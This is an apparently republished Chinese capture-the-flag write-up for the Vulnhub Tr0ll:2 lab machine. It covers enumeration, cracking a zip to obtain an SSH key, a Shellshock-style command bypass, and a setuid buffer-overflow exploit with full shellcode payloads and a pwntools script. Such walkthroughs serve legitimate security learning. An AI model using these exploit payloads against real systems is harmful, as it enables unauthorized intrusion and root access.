前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【Vulnhub】Tr0ll:2

【Vulnhub】Tr0ll:2

作者头像
yichen
发布2020-08-28 14:45:01
8560
发布2020-08-28 14:45:01
举报
文章被收录于专栏:陈冠男的游戏人生

首先扫描端口

扫目录,发现了这些东西,去访问一下

robots.txt 中有很多目录

去访问了一下,在

dont_bother keep_trying noob ok_this_is_it

这四个目录下有图片,下载下来,发现 dont_bother 跟其他图片的 md5 不一样

用 winhex 看,最后有一行 Look Deep within y0ur_self for the answer

去访问一下,得到一个文件

文件中是一些 base64 编码后的东西

写个小脚本转一下

代码语言:javascript
复制
import base64
file = open('./flag.txt','r')
lines = file.readlines()
new=[]
for line in lines:
    line=base64.b64decode(line)
    new.append(line)
file_out=open('./flag_out.txt','w')
for line1 in new:
    file_out.writelines(line1)
file_out.close()
代码语言:javascript
复制

用 ftp 协议去访问一下,使用 Tr0ll:Tr0ll 登录成功

下载下来,用刚才拿到的字典跑一下,瞬间出结果:

ItCantReallyBeThisEasyRightLOL

用 winhex 打开压缩包里的文件,看上去是私钥

尝试去登陆 ssh -i noob noob@192.168.149.192

-i 是指定密钥的,我猜用户名就是 noob

但是提示说权限有问题?

说是我这个密钥权限太高了,那就改的小一点,wsl 改不了 windows 正常目录下的文件权限,拷到 wsl 自己的目录下改权限再试

用这种方式绕过:

代码语言:javascript
复制
ssh -i noob noob@192.168.149.192 '() { :;}; /bin/bash'
代码语言:javascript
复制

再用 python 弄个好看点的

代码语言:javascript
复制
python -c 'import pty; pty.spawn("/bin/bash")'

嗷,涨知识了

在 /nothing_to_see_here/choose_wisely 中每个文件夹有二进制文件,都有 s 的权限

啊我吐了,nc 也不能用,git 也没有

执行第一个给我退出来了

试了一下第二个进入了困难模式??

第三个貌似是栈溢出

cyclic 算出偏移

过了一会文件又没了去了 door2... 被作者玩弄于股掌之间

代码语言:javascript
复制
./r00t $(python -c "print 'A' * 268 + '\x80\xfb\xff\xbf' + 'a' * 16  + '\xba\xa0\x7b\x18\x95\xdb\xcd\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0b\x31\x50\x15\x83\xe8\xfc\x03\x50\x11\xe2\x55\x11\x13\xcd\x0c\xb4\x45\x85\x03\x5a\x03\xb2\x33\xb3\x60\x55\xc3\xa3\xa9\xc7\xaa\x5d\x3f\xe4\x7e\x4a\x37\xeb\x7e\x8a\x67\x89\x17\xe4\x58\x3e\x8f\xf8\xf1\x93\xc6\x18\x30\x93'")

就先拿大佬们的 payload 来打了,突然发现在这种情况先我都不知道咋分析,不知所措

我想把这个靶机的内容给提出来,直接拷到 /var/www 目录下,浏览器访问下载下来

后来在本地做的

代码语言:javascript
复制
from pwn import *
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += "\x0b\xcd\x80"
payload=shellcode+'a'*(268-len(shellcode))+'\xc0\xd3\xff\xff'
print payload
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-08-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 陈冠男的游戏人生 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档